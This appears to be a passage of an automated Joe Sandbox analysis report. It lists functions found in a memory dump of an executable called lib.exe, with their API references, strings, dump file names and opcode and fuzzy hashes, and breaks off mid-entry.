API String ID: 2506987500-0
Opcode ID: 9b225a077f4281318a7ef705813386e144cc6119260bee2e0aedcf55e065e7dc
Instruction ID: 82f8f1ab5acfd893716b338e27e1836ad896b448048da1a9f59ea561db1967b2
Opcode Fuzzy Hash: 9b225a077f4281318a7ef705813386e144cc6119260bee2e0aedcf55e065e7dc
Instruction Fuzzy Hash: 35116D20B0A68242FA587F61E95113AE1724FC67B0FAD4739E96E0B7D6DF2CA4414222

Function 00007FF75995BC08 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF75995BC33
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF75995BCC8
RtlUnwindEx.KERNEL32 ref: 00007FF75995BD17

Strings

csm, xrefs: 00007FF75995BCAE
f, xrefs: 00007FF75995BC46

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: e4cc0f9b1589dd73a5d4f416534ce71b9b3e94dd2aede877d85d93aa73312820
Instruction ID: 5e2e47a1ca788683bb7b2ecc76d3b93d4b7b93a7229837d50f281ece811eecc9
Opcode Fuzzy Hash: e4cc0f9b1589dd73a5d4f416534ce71b9b3e94dd2aede877d85d93aa73312820
Instruction Fuzzy Hash: 1551C472A096469BEB14EF15E404B7AB7B9FF81B88F988030DA4E47748DF39E841C710

Function 00007FF759968A40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF759968A65
GetProcAddress.KERNEL32 ref: 00007FF759968A7B
FreeLibrary.KERNEL32 ref: 00007FF759968AA2

Strings

mscoree.dll, xrefs: 00007FF759968A5C
CorExitProcess, xrefs: 00007FF759968A74

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 78a1a69aac29132cf000f84d0d5f993c26bceca4d1e4e1c3cfa2e89eec15c9a9
Instruction ID: df33b23493ee873e2b225585d261e19ccaf37254c3f67a3f56cd7a54c902222e
Opcode Fuzzy Hash: 78a1a69aac29132cf000f84d0d5f993c26bceca4d1e4e1c3cfa2e89eec15c9a9
Instruction Fuzzy Hash: 8CF04F61A19B4281FE14AF25E8453799370BFCA7A1F9C0639CA6D455E4DF2CD049C320

Function 00007FF759978824 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF75997884C
_set_statfp.LIBCMT ref: 00007FF759978867
_set_statfp.LIBCMT ref: 00007FF759978883
_set_statfp.LIBCMT ref: 00007FF7599788BF

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
Instruction ID: b3c7303b3f6d7a748b9785f0929be573d8311530aafd7ca54a1e010f9e1ac4f7
Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
Instruction Fuzzy Hash: 4C118F22E18A0311F6543F6AD8CA3F599716FD6374E8C0A38E97E466DBDF2CF8414261

Function 00007FF75996A9C0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF759969BD3,?,?,00000000,00007FF759969E6E,?,?,?,?,?,00007FF759961A40), ref: 00007FF75996A9DF
FlsSetValue.KERNEL32(?,?,?,00007FF759969BD3,?,?,00000000,00007FF759969E6E,?,?,?,?,?,00007FF759961A40), ref: 00007FF75996A9FE
FlsSetValue.KERNEL32(?,?,?,00007FF759969BD3,?,?,00000000,00007FF759969E6E,?,?,?,?,?,00007FF759961A40), ref: 00007FF75996AA26
FlsSetValue.KERNEL32(?,?,?,00007FF759969BD3,?,?,00000000,00007FF759969E6E,?,?,?,?,?,00007FF759961A40), ref: 00007FF75996AA37
FlsSetValue.KERNEL32(?,?,?,00007FF759969BD3,?,?,00000000,00007FF759969E6E,?,?,?,?,?,00007FF759961A40), ref: 00007FF75996AA48

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7e9f7daeefede5d6cf057412dd821cf39c29068a7a1c9ec5056b211d60d8f6b4
Instruction ID: e1be6cc29470ac031505f077cdfd3e5f93e9ce2b08335a528beac89e7e43f397
Opcode Fuzzy Hash: 7e9f7daeefede5d6cf057412dd821cf39c29068a7a1c9ec5056b211d60d8f6b4
Instruction Fuzzy Hash: BF114210B0968241F9587F65EA4117AE1735FC57A0FAC5339E83E0B6D6DF2CA4514622

Function 00007FF75996A854 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F), ref: 00007FF75996A865
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F), ref: 00007FF75996A884
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F), ref: 00007FF75996A8AC
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F), ref: 00007FF75996A8BD
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F), ref: 00007FF75996A8CE

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: beb9e1a05ea758e4ab17276de5b2837cba649d003c822ebdac11e23849688a82
Instruction ID: ad8126982526b9e61b80ab8abc8913a54b22ac870984e08b6bd1ce6c3c8f573b
Opcode Fuzzy Hash: beb9e1a05ea758e4ab17276de5b2837cba649d003c822ebdac11e23849688a82
Instruction Fuzzy Hash: 3911FE20E0A28741F9587EA5D85217AD1724FC5770FEC4738D93E0A2D2DF2CB4524232

Function 00007FF75996F218 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996F4F7

Part of subcall function 00007FF7599754F4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759975511

Strings

ccs, xrefs: 00007FF75996F432
UTF-16LEUNICODE, xrefs: 00007FF75996F495
UTF-8, xrefs: 00007FF75996F476

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: fa9c2c0b9e0b51f4f192ae3b8b8b95ed4a793ff286fdede4dba764f85164dfb1
Instruction ID: d145201d8235b5b4b99cfd3a29167f08bbbb19383b5d17833fb55802a90ec4f4
Opcode Fuzzy Hash: fa9c2c0b9e0b51f4f192ae3b8b8b95ed4a793ff286fdede4dba764f85164dfb1
Instruction Fuzzy Hash: 9D81C332E0C28285F7647F2AC154678B6B0EF95BC4FDD8039DA0997A89CF2DE9019731

Function 00007FF75995D468 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF75995D4B4
_CallSETranslator.LIBVCRUNTIME ref: 00007FF75995D503

Strings

MOC, xrefs: 00007FF75995D4C8
RCC, xrefs: 00007FF75995D4D1

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: f09742bcba9082defbae069630545238114b431a0e4fd7be58dd8469a5d7fef1
Instruction ID: 115b9b6399b53cf91dab0fe931a2696fb8b4359042a3f77089b98f136a869c9c
Opcode Fuzzy Hash: f09742bcba9082defbae069630545238114b431a0e4fd7be58dd8469a5d7fef1
Instruction Fuzzy Hash: CB617B72A09A459AEB10EF65D0403AEB7B0FB85B8CF484225EF4D17B98DF38E056C750

Function 00007FF75995D7C4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF75995D7EC
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF75995D8D4

Strings

csm, xrefs: 00007FF75995D926
csm, xrefs: 00007FF75995D80E

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: a3990994d2fbb822c09bdc2a35b5fa2b647080e9aebb1a5b00e12dffe7bfe986
Instruction ID: 8b8a5e3e5a3cd20b593b6aaa0b711630fd50762716149e72112dc2d9f8146522
Opcode Fuzzy Hash: a3990994d2fbb822c09bdc2a35b5fa2b647080e9aebb1a5b00e12dffe7bfe986
Instruction Fuzzy Hash: 9851BD3290968296EB64AF21945036AB7B0FFC5B95F8C4136DB9C47B99CF3CE450CB10

Function 00007FF759952CD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7599527C9,?,?,?,?,?,?), ref: 00007FF759952D01

Part of subcall function 00007FF759951CB0: GetLastError.KERNEL32(?,?,00000000,00007FF759956904,?,?,?,?,?,?,?,?,?,?,?,00007FF759951023), ref: 00007FF759951CD7

Strings

Failed to get executable path., xrefs: 00007FF759952D0B
Failed to convert executable path to UTF-8., xrefs: 00007FF759952D3A
GetModuleFileNameW, xrefs: 00007FF759952D12

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2776309574-1977442011
Opcode ID: 7987a5ce4ff3c8cba7d8c38c60f2d05ca27952d1a3ea66f3204455115dc1ef10
Instruction ID: 70132a1707434f69ce95fa43871d29f10dddacaf8fc070649e32e01a8ed0c8a3
Opcode Fuzzy Hash: 7987a5ce4ff3c8cba7d8c38c60f2d05ca27952d1a3ea66f3204455115dc1ef10
Instruction Fuzzy Hash: 3C01A760B1D642A2FB61BF20D8453BAD2B5AFD97C0FCC4032D84D86296EF1DE144C720

Function 00007FF75996BBD0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF75996BC4F
WriteFile.KERNEL32 ref: 00007FF75996BF17
WriteFile.KERNEL32 ref: 00007FF75996BF5D
GetLastError.KERNEL32 ref: 00007FF75996C013

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 47f9f7c1e3185106a498671fedee26090088e719dd8e44b73d57f810765c87d4
Instruction ID: 79d50cae4bdd7f2b1f8f9878bed1f556841033320cc75acb1538483282b5cb2c
Opcode Fuzzy Hash: 47f9f7c1e3185106a498671fedee26090088e719dd8e44b73d57f810765c87d4
Instruction Fuzzy Hash: 64D12372B08A8089E710DF69C4402ACB7B5FB847D8B884236DE5E97B99EF38D016C750

Function 00007FF75996483C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF75996486F
GetFileInformationByHandle.KERNEL32 ref: 00007FF7599648D1
GetLastError.KERNEL32 ref: 00007FF759964962
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF759964774), ref: 00007FF7599649AE

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 1291a0862dc251a0f1dda952d285f4a36c3dc69b0fb142e3468d3d288eb0a289
Instruction ID: 336ab6cb2fce0f8c57e41eeb6324002855be486da9254fb4db72d01d71fea1cd
Opcode Fuzzy Hash: 1291a0862dc251a0f1dda952d285f4a36c3dc69b0fb142e3468d3d288eb0a289
Instruction Fuzzy Hash: A451B062E086818AFB10EFB1D4503BDA3B1BF85B59F989035DE4E57689DF38D481C760

Function 00007FF759974DBC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF759970920: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759970953

_get_daylight.LIBCMT ref: 00007FF759974ED4
_get_daylight.LIBCMT ref: 00007FF759974EE5

Strings

?, xrefs: 00007FF759974E65

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 610c018c2ed3d43a6dc6b39dfd7623f8c002a97b49fdc2d3a9d4eaa2ab755e24
Instruction ID: f9951acc7f3ed1f4cd9f511d82c0d392bde210473635ce05a317d7227f86763e
Opcode Fuzzy Hash: 610c018c2ed3d43a6dc6b39dfd7623f8c002a97b49fdc2d3a9d4eaa2ab755e24
Instruction Fuzzy Hash: BA41E462B1828242FF64AF25E401379E771EFD2BA4F985235EE5C46AD6DF3CD4818710

Function 00007FF759967FD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF759968002

Part of subcall function 00007FF759969F78: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF759971EC2,?,?,?,00007FF759971EFF,?,?,00000000,00007FF7599723C5,?,?,00000000,00007FF7599722F7), ref: 00007FF759969F8E
Part of subcall function 00007FF759969F78: GetLastError.KERNEL32(?,?,?,00007FF759971EC2,?,?,?,00007FF759971EFF,?,?,00000000,00007FF7599723C5,?,?,00000000,00007FF7599722F7), ref: 00007FF759969F98

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF75995A485), ref: 00007FF759968020

Strings

C:\Users\user\AppData\Local\Temp\lib.exe, xrefs: 00007FF75996800E

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\lib.exe
API String ID: 3976345311-1935384366
Opcode ID: 87397ab4d942c93eb7ecf5272dbc7224ab3e9c0a5ace0b49458789d652eb9e0d
Instruction ID: 949a99336f953dee09efc373ca1c6a077a390b9b7634acb6f7a1ab5a0c79ee05
Opcode Fuzzy Hash: 87397ab4d942c93eb7ecf5272dbc7224ab3e9c0a5ace0b49458789d652eb9e0d
Instruction Fuzzy Hash: 59417236A08B8286E714BF26D8410FDA3B8EB857C4BD94435E94E47B95DF3CE4818360

Function 00007FF75996C268 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF75996C37F
GetLastError.KERNEL32 ref: 00007FF75996C3A1

Strings

U, xrefs: 00007FF75996C32B

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 3868b3aae24abb70b6c7ced641cfa87b6d54125405e373b4c87f7bfc476be08b
Instruction ID: 92eeb12e51fb9ddfc919a17fe197bc60e79dd84bd4f86e091674bf78a0dd96f3
Opcode Fuzzy Hash: 3868b3aae24abb70b6c7ced641cfa87b6d54125405e373b4c87f7bfc476be08b
Instruction Fuzzy Hash: 4E41B432619A8186DB209F65E8457AAB7B0FBD8794F884035EE4D87758EF3CD441C7A0

Function 00007FF75996E588 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF75996E5C8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF75996E61A

Strings

:, xrefs: 00007FF75996E5DE

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 299dd2601fabda0eaedb6d74bbca1af16fe573635883c06f79dbd5a665f7b651
Instruction ID: 242b0dd1a07bcb72c6efe980ecdd9da54a1db9b1689bdfb08a15e71748eb4313
Opcode Fuzzy Hash: 299dd2601fabda0eaedb6d74bbca1af16fe573635883c06f79dbd5a665f7b651
Instruction Fuzzy Hash: 2021B162B086C182FB20AF55D44426EB3B2FBC4B84FD98039DA8D47285DF7CE955CB61

Function 00007FF75995E310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF75995E354
RaiseException.KERNEL32 ref: 00007FF75995E39A

Strings

csm, xrefs: 00007FF75995E387

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: ee4cd62d6736e0f26efa3482034fbaa09f2706f16dc7c85cfdea4997af4e44da
Instruction ID: e032faa1ff7745428abdd20a5e3cbd384fd7b5f36786c93ae9ddef4844113f3a
Opcode Fuzzy Hash: ee4cd62d6736e0f26efa3482034fbaa09f2706f16dc7c85cfdea4997af4e44da
Instruction Fuzzy Hash: BC114C32608B4192EB209F15F44026AB7B4FB88B84F5C4234EE8D07B68DF3DD551CB10

Function 00007FF75996F08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996F0BC
GetDriveTypeW.KERNEL32 ref: 00007FF75996F0FC

Strings

:, xrefs: 00007FF75996F0E5

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

